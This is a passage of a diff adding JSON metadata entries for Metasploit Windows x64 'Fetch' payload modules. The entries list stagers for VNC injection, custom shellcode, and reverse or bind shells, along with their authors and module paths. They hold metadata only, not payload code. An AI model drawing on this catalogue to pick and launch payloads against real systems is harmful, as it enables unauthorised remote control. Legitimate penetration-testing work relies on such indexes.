"payload/cmd/windows/http/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/http/x64/vncinject/bind_tcp_rc4": { + "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/http/x64/vncinject/bind_tcp_uuid": { + "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_http": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_https": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_https", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_tcp_rc4": { + "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_tcp_uuid": { + "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_winhttp": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_winhttps": { + "name": "HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/https/x64/custom/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/https/x64/custom/bind_named_pipe": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/https/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/https/x64/custom/bind_tcp": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/https/x64/custom/bind_tcp_rc4": { + "name": "HTTPS Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/https/x64/custom/bind_tcp_uuid": { + "name": "HTTPS Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/https/x64/custom/reverse_http": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_http", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/https/x64/custom/reverse_https": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_https", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/https/x64/custom/reverse_named_pipe": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/https/x64/custom/reverse_tcp": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/https/x64/custom/reverse_tcp_rc4": { + "name": "HTTPS Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/https/x64/custom/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/https/x64/custom/reverse_winhttp": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/https/x64/custom/reverse_winhttps": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/https/x64/encrypted_shell/reverse_tcp": { + "name": "HTTPS Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/encrypted_shell", + "stager_refname": 